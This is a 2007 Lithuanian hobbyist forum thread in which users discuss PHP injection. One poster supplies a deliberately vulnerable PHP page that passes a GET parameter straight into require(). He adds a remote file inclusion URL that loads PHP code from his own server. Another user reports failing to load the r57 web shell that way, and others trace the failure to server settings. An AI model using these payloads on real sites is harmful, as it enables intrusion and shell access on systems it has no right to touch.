[phpBB Debug] PHP Warning: in file [ROOT]/viewtopic.php on line 22: include(./includes/bbcode.php): failed to open stream: No such file or directory
[phpBB Debug] PHP Warning: in file [ROOT]/viewtopic.php on line 22: include(./includes/bbcode.php): failed to open stream: No such file or directory
[phpBB Debug] PHP Warning: in file [ROOT]/viewtopic.php on line 22: include(): Failed opening './includes/bbcode.php' for inclusion (include_path='.:/opt/plesk/php/7.4/share/pear')
Straipsniai.lt •Bendras forumas - Puslapis 27
Puslapis 2728

Parašytas: 2007 04 14 14:10
GODhack
Naujas įrankis, pernelyg pavojingas, kad būtų parodytas.... :lol:
O siandien ryte as su Perl parasiau virusa kuris uzkrecia zmones, bet suprantat jis per daug pavojingas kad butu parodytas. :lol:

Kokiu mulkiu reik but kad tuo patiket?

Parašytas: 2007 04 14 16:32
brain5ide
Turint omeny, kad kalbama apie Javascript'ą ir client side kodo vykdymą tai visiškai realu, tuo tarpu Perl ir DNR kodus susieti būtų sudėtinga :)

Parašytas: 2007 04 14 17:53
GODhack
Nea. Abiem atvejais tiek toje naujienoje tiem mano "isradime" tiek pat realu kaip nusiperdus nuskrist i menuli kaip raketai. ir gala man tu mulkiu kurie tuo tiki.

Parašytas: 2007 04 19 21:05
^Paulius^
Ar imanoma kaip nors per PHP injekcija upload'inti PHP skripta? Jeigu imanoma, tai kaip? :oops:

Parašytas: 2007 04 20 19:11
GODhack
Tarkim turim saita lamynas.lt/lama.php:

blabla

Kodas: Pasirinkti visus

<?php
   $color = 'blue';
   if ( isset( $_GET['SPALVA'] ) )
      $color = $_GET['SPALVA'];
   require( $color . '.php' );
?>
<form>
   <select name="SPALVA">
      <option value="red">red</option>
      <option value="blue">blue</option>
   </select>
   <input type="submit">
</form>
ir t.t. ...

Tada rasom:

Kodas: Pasirinkti visus

/lama.php?SPALVA=http://mano.kieciausias.saitas/phpkodas
Viskas. Ivedei php koda panaudodamas tikriausiai pacia paraciausia failo ivedimo i php injekcija. Gali pazaisti-pameginti ar tai tikrai suveikia ir kaip tai suveikia.

Tik bebejo cia as dar pavargau kol sugalvojau toki superlengvai pazeidziama pacio saito php koda. realybej truputi sunkiau buna.

Parašytas: 2007 04 20 21:10
^Paulius^
As kazka panasaus zinojau is zurnalo HAKERIS. Su PHP injekcija imanoma paleisti shell'a? Itariu, kad ne, todel ir noriu suzinoti kaip per PHP injekcija irasyti faila. :?

Parašytas: 2007 04 20 21:15
GODhack
Tai as tau tai ir parasiau. Pamegink kur nors.
Kurios vietos nesupratai? Ar gal nesigauna? Nes nebandziau pats sitos savo rasliavos neturiu http servo po ranka.

Parašytas: 2007 04 20 21:26
E~XODU~S
Gal kas žinote iš kur parsisiūsti CIA 1.3 versiją?Nes RAt[] neveikia :roll: Gal kas žinote?

Parašytas: 2007 04 20 21:45
^Paulius^
GODhack rašė:Tai as tau tai ir parasiau. Pamegink kur nors.
Kurios vietos nesupratai? Ar gal nesigauna? Nes nebandziau pats sitos savo rasliavos neturiu http servo po ranka.
Na as bandau paleisti r57 shell'a ir man meta tokias klaidas:

Kodas: Pasirinkti visus

Warning: require() [function.require]: URL file-access is disabled in the server configuration in C:\wamp\www\index.php on line 5

Warning: require(http://127.0.0.1/r57shell.php) [function.require]: failed to open stream: no suitable wrapper could be found in C:\wamp\www\index.php on line 5

Fatal error: require() [function.require]: Failed opening required 'http://127.0.0.1/r57shell.php' (include_path='.;C:\php5\pear') in C:\wamp\www\index.php on line 5
Buvo dar daugiau, bet kai kurias sugebejau susitvarkyt. Is viso imanoma taip paleist? :roll:

E~XODU~S, http://www.google.lt/search?hl=lt&q=CIA ... A1ka&meta=

Parašytas: 2007 04 20 23:58
GODhack
Nors paprastai tai naudojama exploito ikelimui, bet teoriskai imanoma ir tai ka tu nori padaryt.

Netrodo labai jau ziaurus tie tavo erorai galima isnagrineti juos ir ju isvangti.
Bent jau zaidybineje situacijoje kai pats sau ir adminas esi. Kaip matau reikalaujama kitokios konfiguracijos.

Parašytas: 2007 04 21 11:56
E~XODU~S
Nu nerandu...Užmuškite...gal kas galite duoti tikslią veikinčią svetainę? :roll: :roll: :roll: (sorry už nemandagumą :) )

Parašytas: 2007 04 21 13:43
GODhack

Parašytas: 2007 04 21 23:03
brain5ide
GODhack rašė:Nors paprastai tai naudojama exploito ikelimui, bet teoriskai imanoma ir tai ka tu nori padaryt.

Netrodo labai jau ziaurus tie tavo erorai galima isnagrineti juos ir ju isvangti.
Bent jau zaidybineje situacijoje kai pats sau ir adminas esi. Kaip matau reikalaujama kitokios konfiguracijos.
Tiesą sakant tie errorai labai žiaurūs. Greičiausiai įjungtas pačiam serveryje SAFE_MODE ir neleidžia includinti nuotoliniu failu. Jeigu ir leistu tuos failus includinti, tai si r57 shello(ar bet kokio kito PHP shello) nebūtų naudos, nes paprasčiausiai uždraustos visos sisteminės funkcijos, kaip exec, system ir pan.

Parašytas: 2007 04 22 00:06
GODhack
Bet zaidybineje situacijoje galima ju isvengti. Ne taip tiesiog supratai mano pasakyma "nelabai ziaurus". Kaip ir pats sakei si bei ta pakeitus is admino puses erroru nelieka. Taigi tai nera kritiniai, neisvengiami errorai zlugdantys bet kokias viltis.

Aiskiau isireiskiant turim labai realia ir gan paprasta teorine galimybe ir beveik neigivendinama praktine.

Parašytas: 2007 04 22 00:17
brain5ide
GODhack, apsikeitėm vaidmenim? Aš anksčiau teorines galimybes gvildendavau, o tu praktines :D